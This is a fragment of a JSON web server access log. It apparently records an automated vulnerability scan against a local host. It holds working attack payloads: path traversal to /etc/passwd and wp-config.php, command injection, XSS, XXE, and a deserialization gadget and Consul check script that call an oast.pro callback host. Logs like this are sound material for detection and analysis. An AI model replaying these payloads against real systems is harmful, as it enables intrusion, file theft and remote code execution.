HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /view/viewer_index.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\x22,\x0D\x0A \x22properties\x22:{\x0D\x0A \x22@type\x22:\x22java.util.Properties\x22,\x0D\x0A \x22UserTransaction\x22:\x22rmi://ca2tuc8smpv1g2s80ca09autzyqdhjdqt.oast.pro/Exploit\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/wdisp/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"payload=<%3fxml+version%3d\x221.0\x22+%3f>%25xxe%3b]>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/62 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pics/logo_70x29px.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /karma.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/proxy/tcp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dc2/admin/auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/63 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"{\x0D\x0A \x22user_login\x22:\x2229N5EhjmeJyog4b0H1kR0RixjI0\x22,\x0D\x0A \x22password\x22:\x2229N5EhjmeJyog4b0H1kR0RixjI0\x22,\x0D\x0A \x22user_name\x22:\x2229N5EhjmeJyog4b0H1kR0RixjI0\x22,\x0D\x0A \x22user_email\x22:\x2229N5EhjmeJyog4b0H1kR0RixjI0@example.com\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-json/buddypress/v1/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/js/magmi_utils.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?return_url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kb_view_customer.do?sysparm_article=KB00xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kustomization.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /command.cgi?cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/img/favicon-32x32.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/64 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin%202/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"{\x0D\x0A \x22ID\x22: \x2229N5EeyvOgvTN20njZE9GvVRMoP\x22,\x0D\x0A \x22Name\x22: \x2229N5EeyvOgvTN20njZE9GvVRMoP\x22,\x0D\x0A \x22Address\x22: \x22127.0.0.1\x22,\x0D\x0A \x22Port\x22: 80,\x0D\x0A \x22check\x22: {\x0D\x0A \x22script\x22: \x22nslookup ca2tuc8smpv1g2s80ca0fbeq6uyunguqf.oast.pro\x22,\x0D\x0A \x22interval\x22: \x2210s\x22,\x0D\x0A \x22Timeout\x22: \x2286400s\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /v1/agent/service/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/health-check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xml/User/User.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 